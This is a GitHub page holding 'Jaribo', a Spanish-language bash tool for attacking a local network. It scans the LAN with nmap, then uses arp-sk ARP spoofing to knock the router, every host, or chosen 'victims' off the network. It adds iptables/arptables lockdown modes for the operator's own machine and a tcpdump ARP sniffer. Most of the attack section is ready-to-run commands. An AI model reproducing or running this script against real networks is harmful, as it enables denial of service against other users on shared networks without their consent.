This repository has been archived by the owner on Jul 13, 2021. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
/
jaribo.0.25J.sh
executable file
·383 lines (298 loc) · 13 KB
/
jaribo.0.25J.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
#!/bin/bash
function modo_seguro(){
clear
echo " )------------------------------------------------------------------------------("
echo " )------------------------- ENTRANDO EN MODO SEGURO ----------------------------("
echo " ) - - - - - ⌬ - - - - - - AISLANDO MÁQUINA DE LA RED - - - - - - - ⌬ - - - - - ("
echo " )------------------------------------------------------------------------------("
echo " )----------- Conexiónes salientes activas y salientes por el puerto 80 --------("
echo " )------------------------------------------------------------------------------("
echo ""
iptables -F
iptables -P FORWARD DROP
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT
arptables -F
arptables -P INPUT DROP
arptables -P OUTPUT ACCEPT
echo ""
echo " )------------------------------- IPTABLES -------------------------------------("
iptables -L -n
echo ""
echo " )------------------------------ ARPTABLES -------------------------------------("
arptables -L -n
sleep 2
clear
}
function modo_defcon1(){
clear
echo " )------------------------------------------------------------------------------("
echo " )--------------------------- ENTRANDO EN DEFCON 1 -----------------------------("
echo " ) - - - - - ⌬ - - - - - - AISLANDO MÁQUINA DE LA RED - - - - - - - ⌬ - - - - - ("
echo " )------------------------------------------------------------------------------("
echo " )----------------------- Conexiónes salientes activas -------------------------("
echo " )------------------------------------------------------------------------------("
echo ""
iptables -F
iptables -P FORWARD DROP
iptables -P INPUT DROP
iptables -P OUTPUT DROP
arptables -F
arptables -P INPUT DROP
arptables -P OUTPUT ACCEPT
echo ""
echo " )------------------------------- IPTABLES -------------------------------------("
iptables -L -n
echo ""
echo " )------------------------------ ARPTABLES -------------------------------------("
arptables -L -n
sleep 2
clear
}
function modo_abierto(){
clear
echo " )------------------------------------------------------------------------------("
echo " )-------------------------- RESTAURANDO CONEXIONES ----------------------------("
echo " ) - - - - - ⌬ - - - - - ABRIENDO CONEXIONES A LA RED - - - - - - - ⌬ - - - - - ("
echo " )------------------------------------------------------------------------------("
echo " )----------------- Conexiónes entrantes y salientes activas -------------------("
echo " )------------------------------------------------------------------------------("
echo ""
iptables -F
iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
arptables -F
arptables -P INPUT ACCEPT
arptables -P OUTPUT ACCEPT
echo ""
echo " )------------------------------- IPTABLES -------------------------------------("
iptables -L -n
echo ""
echo " )------------------------------ ARPTABLES -------------------------------------("
arptables -L -n
sleep 2
clear
}
function networkpanic(){
clear
echo " )------------------------------------------------------------------------------("
echo " )------------------------- ENTRANDO EN MODO PANICO ----------------------------("
echo " ) - - - - - ⌬ - - - - - - AISLANDO MÁQUINA DE LA RED - - - - - - - ⌬ - - - - - ("
echo " )------------------------------------------------------------------------------("
echo " )----------------------- CERRANDO TODAS LAS CONEXIONES ------------------------("
echo " )------------------------------------------------------------------------------("
echo ""
iptables -F
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
iptables -P INPUT DROP
arptables -F
arptables -P INPUT DROP
arptables -P OUTPUT DROP
echo ""
echo " )------------------------------- IPTABLES -------------------------------------("
iptables -L -n
echo ""
echo " )------------------------------ ARPTABLES -------------------------------------("
arptables -L -n
sleep 2
clear
}
function configurador_inicial(){
clear
echo ' ⌬ ___ ____ _____ _ __ ⌬ '
echo ' | || __ || ___ \(_)| | '
echo ' | ||(__)|| |_/ / _ | |__ ___ ⌬ '
echo ' ⌬ | || __ || / | || __ |/ _ \ ⌬'
echo ' __ / || || || |\ \ | || (__)| (_) ⌬'
echo ' ⌬ |_______||_||_|\_| \_\|_||_____|\___/ ⌬'
echo "+) Bienvenido al proyecto Jaribo un inhibidor de red a nivel local | v0.23("
echo " |------------------------------------------------------------------------|"
echo " |--------- Dime la dirección del router y la mascara de red -------------|"
echo " |------------------------------------------------------------------------|"
echo "-) Puede que esta información de ayude a saber cual es la dirección |"
echo " | `ifconfig | grep 'broadcast' | sed -e 's/^[ \t]*//'`"
echo ""
read red
clear
echo ' ⌬ ___ ____ _____ _⌬ __ '
echo ' ⌬ | || __ || ___ \(_)| | ⌬ '
echo ' | ||(__)|| |_/ / _ | |__ ___ '
echo ' ⌬ | || __ || / | || __ |/ _ \ ⌬'
echo ' __ / || || || |\ \ | || (__)| (_) ⌬'
echo ' |_______||_||_|\_| \_\|_||_____|\___/ ⌬'
echo "+) Bienvenido al proyecto Jaribo un inhibidor de red a nivel local | v0.23("
echo " )------------------------------------------------------------------------("
echo " |---------------------- Dime el adaptador de red ------------------------|"
netstat -i
echo ""
netstat -i | tail +3 | cut -d " " -f 1 | nl -ba
echo ""
read ether
ether=`netstat -i | tail +3 | cut -d " " -f 1 | awk NR==$ether`
clear
}
configurador_inicial #Acceso a la funcion de arriba.
while [ true ]
do
echo " --------------------------------------------------------------------------"
echo " ) Bienvenido al proyecto Jaribo un inhibidor de red a nivel local | v0.23("
echo " |------------------------------------------------------------------------|"
echo " |--------> Consolas de supresión apuntando a '$red' desde '$ether'"
echo " |------------------------------------------------------------------------|"
echo " |- 0) Refrescar las conexiones. |"
echo " |- 1) Mostrar a los JARIBOS. |"
echo " |- 2) Inhibir toda la red. |"
echo " |- 3) Vaciar red. |"
echo " |- 4) Inhibir un nodo específico. |"
echo " |- 5) Reconfigurar red y adaptador. |"
echo " |- 6) Muestra el valor de las variables. |"
echo " |-*7) Entrar en modo seguro. |"
echo " |-*8) Entrar en modo DEFCON 1. |"
echo " |-*9) Entrar en modo 'PANICO EN RED'. |"
echo " |-*10) Entrar en modo abierto. |"
echo " |- 11) Muestra iptables y arptables. |"
echo " |- 12) Muestra posibles ataques salientes o entrantes. |"
echo " |------------------------------------------------------------------------|"
echo " |- Intro) Salir. Proyecto Jarius, Vers. Kellis |"
echo " )------------------------------------------------------------------------("
#Genera variables a usando los datos itroducidos
router=`echo $red | cut -d "/" -f 1`
if [ -e Usuarios_en_red.txt ]; # revisa si Usuarios_en_red.txt existe
then
mrouter=`cat Usuarios_en_red.txt | cut -d " " -f 3 | awk NR==1`
else
echo "!)--> Atención, ¡ lista de usuarios no detectada !"
fi
read opt
clear
if [ -z "$opt" ]
then
exit
fi
case $opt in #Empieza en case
0) #Actualiza la lista de Usuarios_en_Red
echo "0)----------------------------ACTUALIZANDO LISTA--------------------------------("
echo "|--- | --- | --- | --- _ --- _ --- _ --- | --- | --- | ---|"
nmap -sP $red | grep "MAC" > Usuarios_en_red.txt #guarda las lineas de la salida del nmap que coinciden con la palara MAC
echo "| --- --- --- LISTA ACTUALIZADA --- --- --- |"
echo "|--- | --- | --- | --- _ --- _ --- _ --- | --- | --- | ---|"
echo "-)------------------------------------------------------------------------------("
sleep 1
clear
;;
1) #Muestra Uusarios_en_red
echo "1)--------------------------- JARIBOS ------------------------------------("
cat Usuarios_en_red.txt | nl -ba
;;
2) #Peta el router
clear
echo "2)--------------------⌬ SUPRESIÓN SOBRE ROUTER ⌬ -------------------------("
echo "⌬)---------------- ACCIONANDO CONSOLA SOBRE '$mrouter' ---------("
xterm -e arp-sk -T u0 -r -i $ether -S $router:AA:BB:CC:DD:EE:FF -s $mrouter &
echo "i) Apreta intro para cancelar la supresión."
read
killall arp-sk
;;
3) #Peta toda la red menos tu y el router - DE MOMENTO NO FUNSIONA
echo "3)----------------- SUPRESIÓN MASIVA EN EJECUCIÓN ------------------------("
echo "⌬)----- SUPRESIÓN MASIVA DETECTADA, ACCIONANDO CONSOLAS SECUNDARIAS ------("
echo "-)------------------------------------------------------------------------("
for mac in `cat Usuarios_en_red.txt | grep "MAC" | cut -d " " -f 3`;
do
if [ "$mac" != "$mrouter" ];
then
xterm -e arp-sk -T u0 -r -i $ether -S $router:AA:BB:CC:DD:EE:FF -s $mac & PIDE=$!
echo "⌬ > EJECUTANDO CONSOLA $PIDE > ACCIONANDO SUPRESIÓN SOBRE $mac"
fi
done
echo "-)------------------------------------------------------------------------("
echo "i) Apreta intro para cancelar la supresión."
read
killall arp-sk
;;
4) #Peta jaribo especifico
clear
echo "-)------------------------------------------------------------------------("
cat Usuarios_en_red.txt | nl -ba
echo "-)------------------------------------------------------------------------("
echo "2) Seleccione a las víctimas, presione intro para salir del modulo ---("
macvic=""
read macvic
if [ -n "$macvic" ]; #si apreta intro vuelve al menú
then
clear
echo ""
for i in $macvic;
do
echo "-)------------------------------------------------------------------------("
mac=`cat Usuarios_en_red.txt | cut -d " " -f 3 |awk NR==$i`
xterm -e arp-sk -T u0 -r -i $ether -S $router:AA:BB:CC:DD:EE:FF -s $mac & PIDE=$!
echo "⌬)-------------- ACCIONANDO CONSOLA $PIDE SOBRE '$mac' -------("
echo "⌬) Nombre del Objetivo > (`cat Usuarios_en_red.txt | cut -d '(' -f 2 | awk NR==$i`"
echo "-)------------------------------------------------------------------------("
echo ""
done
echo "i) Apreta intro para cancelar la supresión."
read
killall arp-sk
macvic=""
else
clear
fi
;;
5) # llama a la funcion de reconfiguración
clear
configurador_inicial
;;
6) # Muestra los valores de las variables, se usa para identificar problemas de configuración u programación
echo "6)------------------------------------------------------------------------("
echo "| red = '$red' --> Se usa para identificar la red y la ip del router"
echo "| ether = '$ether' --> Se usa para identificar el adaptador de salida"
echo "| router = '$router' --> Se usa para identificar la ip del Router"
echo "| mrouter = '$mrouter' --> Se usa para identificar la mac del router"
echo "| ownmac = '$ownmac' --> Se usa para idenfiticar la mac del cliente"
echo "| mac = '$mac' --> Se usa para identificar la mac de la victima"
;;
7)
modo_seguro
;;
8)
modo_defcon1
;;
9)
networkpanic
;;
10)
modo_abierto
;;
11)
echo " )------------------------------- IPTABLES -------------------------------------("
iptables -L -n
echo ""
echo " )------------------------------ ARPTABLES -------------------------------------("
arptables -L -n
;;
12)
echo " |-----> Snifador de ataques. "
echo " |------------------------------------------------------------------------|"
echo " |- 1) Iniciar esnifeo . |"
echo " |- 2) Cancelar esnifeo. |"
echo " |------------------------------------------------------------------------|"
read opt2
if [ $opt2 -eq 2 ];
then
killall tcpdump
clear
else
xterm -e tcpdump -ennqti $ether \( arp or icmp \) &
clear
fi
;;
esac #final del case
done #final del bucle